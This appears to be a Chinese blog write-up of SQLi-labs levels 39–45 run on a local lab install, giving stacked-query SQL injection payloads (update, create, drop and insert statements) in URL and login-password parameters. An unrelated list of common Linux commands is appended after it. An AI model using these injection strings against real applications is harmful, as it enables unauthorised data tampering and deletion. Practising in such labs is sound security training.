LESS-39-40-41-42-43-44-45

less-39在这里插入图片描述
第39与38题的区别为本题id没有单引号。
输入:http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+(无单引号为错误)在这里插入图片描述在这里插入图片描述
LESS-40
在这里插入图片描述
本处的区别在于id为‘)闭合方式;
输入:http://127.0.0.1/sqlilabs/Less-40/?id=1’);create table food like users --+在这里插入图片描述在这里插入图片描述
LESS-41
此处与 less-39 是一致的,区别在于 41 错误不回显。所以我们称之为盲注在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-41/?id=1; drop table food --+在这里插入图片描述在这里插入图片描述
LESS-42
Update 更新数据后,经过 mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。
本关从 login.php 源代码中分析可知:在这里插入图片描述在这里插入图片描述在这里插入图片描述Password 变量在 post 过程中,没有通过 mysql_real_escape_string()函数的处理
的时候密码选项我们可以进行 attack。
登录用户名随意
密码登录用以下的方式:bb’;create table less42 like users

输入:login_user=admin&login_password=bb’;create table less42 like users#在这里插入图片描述在这里插入图片描述
Less-43在这里插入图片描述
本关遇上一题的区别为:闭合方式改变
输入:password=bbb’);update food set price=100 where id=1#在这里插入图片描述在这里插入图片描述
LESS-44在这里插入图片描述
无错误提示;
输入:password=BBB’;insert into food(id,price,username) values (3,30,‘qq’)#在这里插入图片描述在这里插入图片描述LESS-45
和上面相同,不过闭合方式发生改变在这里插入图片描述
输入:password=bbb’);insert into food(id,price,username) values (2,60,‘book’)#在这里插入图片描述在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
以下是 Linux 50 个常用命令: 1. ls - 列出目录内容 2. cd - 更改当前目录 3. pwd - 显示当前工作目录 4. mkdir - 创建目录 5. rmdir - 删除空目录 6. touch - 创建文件 7. cp - 复制文件或目录 8. mv - 移动或重命名文件 9. rm - 删除文件 10. cat - 显示文件内容 11. more - 逐页显示文件内容 12. less - 更适合大文件的文件阅读器 13. head - 显示文件前几行 14. tail - 显示文件末尾几行 15. nano - 简单的文本编辑器 16. vi / vim - 功能强大的文本编辑器 17. chmod - 更改文件权限 18. chown - 更改文件所有者 19. tar - 压缩或解压文件 20. gzip - 压缩文件 21. gunzip - 解压文件 22. zip - 压缩文件 23. unzip - 解压文件 24. find - 查找文件 25. locate - 查找文件 26. which - 查找命令的位置 27. whereis - 查找命令的位置和文件 28. ps - 显示当前进程 29. top - 显示实时系统信息 30. free - 显示内存使用情况 31. df - 显示磁盘使用情况 32. du - 显示目录或文件的磁盘使用情况 33. ping - 测试网络连通性 34. traceroute - 显示数据包从源到目的地的路径 35. ssh - 远程登录 36. scp - 远程复制文件 37. curl - 从网络传输数据 38. wget - 从网络下载文件 39. ftp - 文件传输协议 40. tar - 压缩或解压文件 41. grep - 搜索文件内容 42. sed - 文本替换工具 43. awk - 文本处理语言 44. diff - 比较两个文件的差异 45. sort - 排序文件内容 46. uniq - 去除重复行 47. cut - 剪切文件内容 48. paste - 合并多个文件 49. join - 合并两个文件 50. tty - 显示当前终端名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值